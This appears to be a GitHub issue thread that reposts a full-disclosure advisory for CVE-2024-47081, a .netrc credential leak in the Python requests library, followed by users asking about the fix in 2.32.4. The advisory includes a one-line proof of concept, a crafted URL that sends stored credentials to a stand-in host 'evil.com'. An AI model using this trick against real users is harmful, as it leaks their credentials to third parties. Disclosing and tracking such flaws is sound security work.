requests
requests copied to clipboard
psf
CVE-2024-47081: Netrc credential leak in PSF requests library
There does not yet seem to be an issue nor an advisory about CVE-2024-47081 which was recently disclosed on seclists.org - I'm thus copying the advisory here:
From: Juho Forsén via Fulldisclosure <fulldisclosure () seclists org>
Date: Sat, 31 May 2025 06:30:50 +0000
The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc
credentials to third parties due to incorrect URL processing under specific conditions.
Issuing the following API call triggers the vulnerability:
requests.get('[http://example.com:@evil.com/&apos](http://[email protected]/&apos);)
Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.
The root cause is
https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245
The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.
CVE-2024-47081 has been reserved by GitHub for this issue.
As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.
Link: https://seclists.org/fulldisclosure/2025/Jun/2
So.. will we have a release that contains those fixes? 🤔
It's been more than a week already
Hi,please,https://github.com/psf/requests/pull/6965 is the fix CVE-2024-47081?
Is there an ETA on the resolution for this ? I have my pipelines being flagged due to the same.
2.32.4 has been release which should address this CVE. Resolving now that the patch is available, you can read the public advisory here.
This issue does seem ongoing. Still getting the issue CVE-2024-47081 against version 2.32.4